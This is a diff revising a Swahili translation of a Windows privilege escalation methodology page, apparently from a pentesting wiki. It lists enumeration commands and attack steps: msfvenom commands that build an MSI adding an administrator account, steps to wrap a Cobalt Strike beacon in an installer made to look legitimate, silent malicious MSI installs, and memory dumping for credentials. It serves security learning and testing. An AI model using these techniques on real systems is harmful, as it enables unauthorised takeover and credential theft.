Windows unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** +**Kama haufahamu integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} integrity-levels.md {{#endref}} -## Windows Security Controls +## Udhibiti wa Usalama wa Windows -Kuna mambo tofauti katika Windows ambayo yanaweza **kukuzuia kuhesabu mfumo**, kuendesha executable au hata **kubaini shughuli zako**. Unapaswa **kusoma** **ukurasa** ufuatao na **kuhesabu** mifumo hii yote ya **ulinzi** **kabla ya kuanza kuhesabu kupandisha mamlaka:** +Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza **kukuzuia kuorodhesha mfumo**, kuendesha executables au hata **kubaini shughuli zako**. Unapaswa **kusoma** ukurasa ufuatao na **kuorodhesha** mifumo yote ya **mifumo** **ya ulinzi** kabla ya kuanza upembuzi wa privilege escalation: {{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}} -## System Info +## Taarifa za Mfumo -### Version info enumeration +### Orodhesha taarifa za toleo -Angalia ikiwa toleo la Windows lina udhaifu wowote unaojulikana (angalia pia patches zilizotumika). +Angalia kama toleo la Windows lina udhaifu unaojulikana (angalia pia patches zilizowekwa). ```bash systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information @@ -59,31 +59,31 @@ wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architec Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-Hotfix -description "Security update" #List only "Security Update" patches ``` -### Version Exploits +### Exploits za Toleo -Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni muhimu kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hii database ina zaidi ya udhaifu wa usalama 4,700, ikionyesha **uso mkubwa wa shambulio** ambao mazingira ya Windows yanatoa. +Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni muhimu kwa kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya udhaifu 4,700 za usalama, ikionyesha **eneo kubwa la mashambulizi** ambalo mazingira ya Windows yanatoa. **Kwenye mfumo** - _post/windows/gather/enum_patches_ - _post/multi/recon/local_exploit_suggester_ - [_watson_](https://github.com/rasta-mouse/Watson) -- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas ina watson iliyojumuishwa)_ +- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_ -**Kitaifa na taarifa za mfumo** +**Kwenye kompyuta, kwa taarifa za mfumo** - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng) -**Github repos za exploits:** +**GitHub repos za exploits:** - [https://github.com/nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub) - [https://github.com/abatchy17/WindowsExploits](https://github.com/abatchy17/WindowsExploits) - [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) -### Environment +### Mazingira -Je, kuna taarifa yoyote ya akidi/Juicy iliyohifadhiwa katika mabadiliko ya mazingira? +Je, kuna credential/Juicy info iliyohifadhiwa katika env variables? ```bash set dir env: @@ -99,9 +99,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` -### Fail za PowerShell Transcript +### Faili za PowerShell Transcript -Unaweza kujifunza jinsi ya kuwasha hii katika [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) +Unaweza kujifunza jinsi ya kuiwasha hapa: [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) ```bash #Check is enable in the registry reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription @@ -116,39 +116,39 @@ Stop-Transcript ``` ### PowerShell Module Logging -Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, yakijumuisha amri zilizotekelezwa, mwito wa amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya pato huenda yasikamatwe. +Maelezo ya utekelezaji wa PowerShell pipeline yarekodiwa, yakiwemo amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo yake huenda yasirekodiwe. -Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya hati, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. +Ili kuwezesha hili, fuata maagizo katika sehemu ya "Transcript files" ya nyaraka, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging ``` -Ili kuona matukio 15 ya mwisho kutoka kwa kumbukumbu za PowersShell unaweza kutekeleza: +Ili kuona matukio 15 ya mwisho kutoka kwenye PowersShell logs unaweza kutekeleza: ```bash Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView ``` ### PowerShell **Script Block Logging** -Rekodi kamili ya shughuli na maudhui yote ya utekelezaji wa skripti yanakamatwa, kuhakikisha kwamba kila block ya msimbo inarekodiwa inavyotekelezwa. Mchakato huu unahifadhi njia ya ukaguzi ya kina ya kila shughuli, ambayo ni ya thamani kwa uchunguzi na kuchambua tabia mbaya. Kwa kurekodi shughuli zote wakati wa utekelezaji, maarifa ya kina kuhusu mchakato yanatolewa. +Rekodi kamili ya shughuli pamoja na maudhui yote ya utekelezaji wa script inakusanywa, ikihakikisha kwamba kila block ya code inaandikwa wakati inavyotekelezwa. Mchakato huu unahifadhi audit trail ya kina ya kila shughuli, muhimu kwa forensics na kwa kuchambua malicious behavior. Kwa kuandika shughuli zote wakati wa utekelezaji, taarifa za kina kuhusu mchakato zinapatikana. ```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging ``` -Kusanya matukio ya Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ +Matukio ya kumbukumbu za Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ Ili kuona matukio 20 ya mwisho unaweza kutumia: ```bash Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview ``` -### Mipangilio ya Mtandao +### Mipangilio ya Intaneti ```bash reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" ``` -### Drives +### Diski ```bash wmic logicaldisk get caption || fsutil fsinfo drives wmic logicaldisk get caption,description,providername @@ -156,9 +156,9 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ``` ## WSUS -Unaweza kuathiri mfumo ikiwa masasisho hayajatolewa kwa kutumia http**S** bali http. +Unaweza kudhoofisha mfumo ikiwa maboresho hayataombwi kwa kutumia http**S** bali http. -Unaanza kwa kuangalia ikiwa mtandao unatumia masasisho ya WSUS yasiyo ya SSL kwa kukimbia yafuatayo katika cmd: +Unaanza kwa kukagua kama mtandao unatumia WSUS update isiyo na SSL kwa kuendesha yafuatayo kwenye cmd: ``` reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer ``` @@ -166,7 +166,7 @@ Au yafuatayo katika PowerShell: ``` Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer" ``` -Ikiwa utapata jibu kama moja ya haya: +Ikiwa unapata jibu kama mojawapo ya haya: ```bash HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535 @@ -182,9 +182,9 @@ PSProvider : Microsoft.PowerShell.Core\Registry ``` Na ikiwa `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` au `Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver"` ni sawa na `1`. -Basi, **inaweza kutumika vibaya.** Ikiwa rejista ya mwisho ni sawa na 0, basi, kiingilio cha WSUS kitaachwa. +Basi, **inaweza kutumika.** Ikiwa rejista ya mwisho ni `0`, basi kipengee cha WSUS kitabaki kutotiliwa maanani. -Ili kutumia udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus)- Hizi ni silaha za MiTM zilizofanywa kuwa na nguvu za kuingiza 'sasisho' za 'bandia' katika trafiki ya WSUS isiyo na SSL. +Ili kuchochea udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - Hizi ni MiTM weaponized exploits scripts za kuingiza 'fake' updates kwenye trafiki ya WSUS isiyo-SSL. Soma utafiti hapa: @@ -194,26 +194,26 @@ CTX_WSUSpect_White_Paper (1).pdf **WSUS CVE-2020-1013** -[**Soma ripoti kamili hapa**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ -Kimsingi, hii ndiyo kasoro ambayo hitilafu hii inatumia: +[**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ +Kwa ufupi, hili ndilo kosa ambalo mdudu huyu unalitumia: -> Ikiwa tuna uwezo wa kubadilisha proxy yetu ya mtumiaji wa ndani, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) kwa ndani ili kukamata trafiki yetu wenyewe na kuendesha msimbo kama mtumiaji aliyeinuliwa kwenye mali yetu. +> Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wa ndani, na Windows Updates inatumia proxy iliyowekwa kwenye mipangilio ya Internet Explorer, basi tunaweza kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) kwa ndani ili kukamata trafiki yetu na kuendesha code kama mtumiaji mwenye viwango vya juu kwenye kifaa chetu. > -> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, pia itatumia duka lake la vyeti. Ikiwa tutaunda cheti kilichojisaini wenyewe kwa jina la mwenyeji wa WSUS na kuongeza cheti hiki kwenye duka la vyeti la mtumiaji wa sasa, tutakuwa na uwezo wa kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS haitumii mitindo kama HSTS kutekeleza uthibitisho wa aina ya kuaminiwa kwa matumizi ya kwanza kwenye cheti. Ikiwa cheti kilichowasilishwa kinatambuliwa na mtumiaji na kina jina sahihi la mwenyeji, kitakubaliwa na huduma. +> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia certificate store yake. Ikiwa tutatengeneza self-signed certificate kwa hostname ya WSUS na kuingiza cheti hicho kwenye certificate store ya mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS hainatumii mbinu kama HSTS kuanzisha aina ya validation ya trust-on-first-use kwa cheti. Ikiwa cheti kilichowasilishwa kinatambulika na mtumiaji na kina hostname sahihi, kitakubaliwa na huduma. -Unaweza kutumia udhaifu huu kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara tu itakapokuwa huru). +Unaweza kuchochea udhaifu huu kwa kutumia chombo [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara itakaporuhusiwa). ## KrbRelayUp -Udhaifu wa **kuinua mamlaka ya ndani** upo katika mazingira ya **domeni** ya Windows chini ya hali maalum. Hali hizi ni pamoja na mazingira ambapo **saini ya LDAP haitekelezwi,** watumiaji wana haki za kujitengenezea zinazowawezesha kuunda **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda kompyuta ndani ya domeni. Ni muhimu kutambua kuwa **masharti haya** yanatimizwa kwa kutumia **mipangilio ya kawaida**. +Kuna udhaifu wa **local privilege escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo **LDAP signing is not enforced**, watumiaji wana haki zao za kujipatia ambazo zinaowezesha kusanidi **Resource-Based Constrained Delegation (RBCD)**, na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kuwa **mahitaji** haya yanakidhiwa kwa kutumia **mipangilio chaguomsingi**. -Pata **udhaifu katika** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) +Pata **exploit** katika [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) -Kwa maelezo zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) +Kwa taarifa zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) ## AlwaysInstallElevated -**Ikiwa** hizi 2 za rejista zime **wezeshwa** (thamani ni **0x1**), basi watumiaji wa mamlaka yoyote wanaweza **kusanidi** (kutekeleza) `*.msi` faili kama NT AUTHORITY\\**SYSTEM**. +**Ikiwa** hizi rejista 2 zimewezeshwa (thamani ni **0x1**), basi watumiaji wa daraja lolote wanaweza **kusakinisha** (kuendesha) `*.msi` files kama NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated @@ -223,19 +223,20 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallEle msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted ``` -Ikiwa una kikao cha meterpreter unaweza kujiendesha mbinu hii kwa kutumia moduli **`exploit/windows/local/always_install_elevated`** +Iwapo una kikao cha meterpreter unaweza kuendesha kiotomatiki mbinu hii ukitumia module **`exploit/windows/local/always_install_elevated`** ### PowerUP -Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa faili ya MSI ya Windows ili kupandisha haki. Skripti hii inaandika msanidi wa MSI aliyeandaliwa mapema ambao unahitaji kuongeza mtumiaji/kikundi (hivyo utahitaji ufikiaji wa GIU): +Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binary ya Windows MSI ili kuinua privileges. Skripti hii inaandika installer ya MSI iliyotengenezwa awali ambayo itauliza kuongeza user/group (hivyo utahitaji GIU access): ``` Write-UserAddMSI ``` -Just execute the created binary to escalate privileges. +Tekeleza tu binary iliyotengenezwa ili kupandisha ruhusa. ### MSI Wrapper -Soma hii tutorial ili kujifunza jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka kwamba unaweza kufunga faili ya "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri**. +Soma mwongozo huu ili ujifunze jinsi ya kuunda MSI wrapper ukitumia zana hizi. Kumbuka kwamba unaweza kufunika faili "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri** + {{#ref}} msi-wrapper.md @@ -243,50 +244,52 @@ msi-wrapper.md ### Create MSI with WIX + {{#ref}} create-msi-with-wix.md {{#endref}} ### Create MSI with Visual Studio -- **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe` -- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. +- **Tengeneza** kwa kutumia Cobalt Strike au Metasploit **new Windows EXE TCP payload** katika `C:\privesc\beacon.exe` +- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" katika kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. - Toa mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. -- Endelea kubonyeza **Next** hadi ufikie hatua ya 3 ya 4 (chagua faili za kujumuisha). Bonyeza **Add** na chagua payload ya Beacon uliyotengeneza. Kisha bonyeza **Finish**. -- Taja mradi wa **AlwaysPrivesc** katika **Solution Explorer** na katika **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. -- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa kuonekana kuwa halali zaidi. -- Bonyeza-kulia kwenye mradi na chagua **View > Custom Actions**. -- Bonyeza-kulia **Install** na chagua **Add Custom Action**. -- Bonyeza mara mbili kwenye **Application Folder**, chagua faili yako ya **beacon.exe** na bonyeza **OK**. Hii itahakikisha kwamba payload ya beacon inatekelezwa mara tu installer inapotekelezwa. +- Endelea kubofya **Next** hadi ufikie hatua ya 3 kati ya 4 (choose files to include). Bonyeza **Add** na chagua Beacon payload uliyotengeneza. Kisha bonyeza **Finish**. +- Chagua mradi **AlwaysPrivesc** katika **Solution Explorer** na ndani ya **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. +- Kuna mali nyingine za mradi unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi. +- Bonyeza kulia mradi na chagua **View > Custom Actions**. +- Bonyeza kulia **Install** na chagua **Add Custom Action**. +- Bonyeza mara mbili **Application Folder**, chagua faili yako **beacon.exe** na bonyeza **OK**. Hii itahakikisha beacon payload inatekelezwa mara tu installer itakapotekelezwa. - Chini ya **Custom Action Properties**, badilisha **Run64Bit** kuwa **True**. -- Hatimaye, **build it**. -- Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonyeshwa, hakikisha umeweka jukwaa kuwa x64. +- Mwisho, **build it**. +- Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonyeshwa, hakikisha umeweka platform kuwa x64. ### MSI Installation -Ili kutekeleza **installation** ya faili ya mbaya `.msi` katika **background:** +Ili kutekeleza **installation** ya faili `.msi` ya hasidi kwa **background:** ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi ``` -Ili kutumia udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ +Ili kutekeleza udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ -## Antivirus na Vifaa vya Kugundua +## Antivirus and Detectors -### Mipangilio ya Ukaguzi +### Audit Settings -Mipangilio hii inaamua nini kinachorekodiwa, hivyo unapaswa kulipa kipaumbele +Mipangilio hii inaamua nini kinachorekodiwa (**kurekodiwa**), hivyo unapaswa kulipa umakini ``` reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit ``` ### WEF -Windows Event Forwarding, ni muhimu kujua wapi kumbukumbu zinatumwa +Windows Event Forwarding, ni vizuri kujua logs zinapotumwa ```bash reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager ``` ### LAPS -**LAPS** imeundwa kwa ajili ya **usimamizi wa nywila za Msimamizi wa ndani**, kuhakikisha kwamba kila nywila ni **ya kipekee, iliyopangwa kwa nasibu, na inasasishwa mara kwa mara** kwenye kompyuta zilizounganishwa na eneo. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa ya kutosha kupitia ACLs, kuwapa uwezo wa kuona nywila za msimamizi wa ndani ikiwa wameidhinishwa. +**LAPS** imetengenezwa kwa ajili ya **usimamizi wa nywila za Administrator wa ndani**, kuhakikisha kwamba kila nywila ni **ya kipekee, iliyotengenezwa kwa nasibu, na inasasishwa mara kwa mara** kwenye kompyuta zilizojiunga na domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona nywila za Administrator wa ndani ikiwa wameidhinishwa. + {{#ref}} ../active-directory-methodology/laps.md @@ -294,36 +297,36 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest -Ikiwa inafanya kazi, **nywila za maandiko wazi zinahifadhiwa katika LSASS** (Huduma ya Mfumo wa Mamlaka ya Usalama wa Ndani).\ -[**Maelezo zaidi kuhusu WDigest kwenye ukurasa huu**](../stealing-credentials/credentials-protections.md#wdigest). +Ikiwa inafanya kazi, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ +[**Taarifa zaidi kuhusu WDigest kwenye ukurasa huu**](../stealing-credentials/credentials-protections.md#wdigest). ```bash reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential ``` ### LSA Protection -Kuanzia na **Windows 8.1**, Microsoft ilianzisha ulinzi ulioimarishwa kwa Mamlaka ya Usalama wa Mitaa (LSA) ili **kuzuia** juhudi za michakato isiyoaminika **kusoma kumbukumbu zake** au kuingiza msimbo, hivyo kuimarisha usalama wa mfumo.\ +Kuanzia **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyothibitishwa **kusoma kumbukumbu yake** au kuingiza msimbo, ikiboresha usalama wa mfumo.\ [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ```bash reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL ``` ### Credentials Guard -**Credential Guard** ilianzishwa katika **Windows 10**. Lengo lake ni kulinda akiba za taarifa za kuingia zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama vile mashambulizi ya pass-the-hash.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) +**Credential Guard** ilianzishwa katika **Windows 10**. Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ```bash reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags ``` -### Cached Credentials +### Cheti zilizohifadhiwa -**Akreditif za Kikoa** zinathibitishwa na **Mamlaka ya Usalama wa Mitaa** (LSA) na kutumiwa na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinathibitishwa na kifurushi cha usalama kilichosajiliwa, akreditif za kikoa kwa mtumiaji kawaida huanzishwa.\ -[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). +**Cheti za domain** zinathibitishwa na **Local Security Authority** (LSA) na zinatumiwa na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na pakiti ya usalama iliyosajiliwa, cheti za domain kwa mtumiaji kwa kawaida huundwa.\ +[**Taarifa zaidi kuhusu Cheti zilizohifadhiwa hapa**](../stealing-credentials/credentials-protections.md#cached-credentials). ```bash reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT ``` ## Watumiaji & Vikundi -### Kuorodhesha Watumiaji & Vikundi +### Orodhesha Watumiaji & Vikundi -Unapaswa kuangalia kama kuna vikundi ambavyo unavyohusishwa navyo vina ruhusa za kuvutia +Unapaswa kuangalia ikiwa kuna vikundi ambavyo wewe ni mwanachama vinavyokuwa na ruhusa za kuvutia ```bash # CMD net users %username% #Me @@ -338,31 +341,31 @@ Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource ``` -### Vikundi vya Privileged +### Vikundi vilivyo na mamlaka -Ikiwa wewe **ni mwanachama wa kundi lolote la privileged unaweza kuwa na uwezo wa kupandisha mamlaka**. Jifunze kuhusu vikundi vya privileged na jinsi ya kuvunja sheria zao ili kupandisha mamlaka hapa: +Ikiwa wewe **ni sehemu ya kundi lenye mamlaka, unaweza kuwa na uwezo wa escalate privileges**. Jifunze kuhusu vikundi vilivyo na mamlaka na jinsi ya kuvitumia vibaya ili escalate privileges hapa: {{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}} -### Manipulation ya Token +### Token manipulation -**Jifunze zaidi** kuhusu nini maana ya **token** katika ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ -Angalia ukurasa ufuatao ili **ujifunze kuhusu token za kuvutia** na jinsi ya kuzitumia vibaya: +**Jifunze zaidi** kuhusu ni nini **token** kwenye ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ +Angalia ukurasa ufuatao ili **ujifunze kuhusu token zinazovutia** na jinsi ya kuvitumia vibaya: {{#ref}} privilege-escalation-abusing-tokens.md {{#endref}} -### Watumiaji waliounganishwa / Sesheni +### Watumiaji walioingia / Vikao ```bash qwinsta klist sessions ``` -### Nyumba za nyaraka +### Folda za nyumbani ```bash dir C:\Users Get-ChildItem C:\Users @@ -371,16 +374,16 @@ Get-ChildItem C:\Users ```bash net accounts ``` -### Pata maudhui ya clipboard +### Pata yaliyomo kwenye clipboard ```bash powershell -command "Get-Clipboard" ``` -## Kuendesha Mchakato +## Michakato Zinazokimbia ### Ruhusa za Faili na Folda -Kwanza kabisa, orodhesha mchakato **angalia nywila ndani ya mstari wa amri wa mchakato**.\ -Angalia kama unaweza **kufuta baadhi ya binary inayokimbia** au ikiwa una ruhusa za kuandika kwenye folda ya binary ili kutumia [**shambulio la DLL Hijacking**](dll-hijacking/index.html): +Kwanza kabisa, unapoorodhesha michakato **angalia nywila ndani ya command line ya mchakato**.\ +Angalia ikiwa unaweza **overwrite some binary running** au ikiwa una write permissions za folda ya binary ili ku-exploit [**DLL Hijacking attacks**](dll-hijacking/index.html): ```bash Tasklist /SVC #List processes running and services tasklist /v /fi "username eq system" #Filter "system" processes @@ -391,9 +394,9 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv #Without usernames Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` -Daima angalia kwa [**electron/cef/chromium debuggers** zinazotembea, unaweza kuzitumia kuboresha mamlaka](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). +Daima angalia uwezekano wa [**electron/cef/chromium debuggers** zikiendeshwa, unaweza kuzitumia ku-escalate privileges](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). -**Kuangalia ruhusa za binaries za michakato** +**Kuangalia ruhusa za binaries za processes** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do ( @@ -402,7 +405,7 @@ icacls "%%z" ) ) ``` -**Kuangalia ruhusa za folda za binaries za michakato (**[**DLL Hijacking**](dll-hijacking/index.html)**)** +**Kukagua ruhusa za folda za binaries za michakato (**[**DLL Hijacking**](dll-hijacking/index.html)**)** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do ( @@ -410,19 +413,19 @@ icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone todos %username%" && echo. ) ``` -### Uchimbaji wa Nywila za Kumbukumbu +### Memory Password mining -Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendelea ukitumia **procdump** kutoka sysinternals. Huduma kama FTP zina **nywila wazi wazi katika kumbukumbu**, jaribu kutupa kumbukumbu na kusoma nywila. +Unaweza kuunda memory dump ya process inayokimbia kwa kutumia **procdump** kutoka sysinternals. Huduma kama FTP zina **credentials in clear text in memory**, jaribu kufanya memory dump na kusoma credentials. ```bash procdump.exe -accepteula -ma ``` -### Insecure GUI apps +### Programu za GUI zisizo salama -**Programu zinazotembea kama SYSTEM zinaweza kumruhusu mtumiaji kuzindua CMD, au kuvinjari saraka.** +**Programu zinazoendeshwa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** Mfano: "Windows Help and 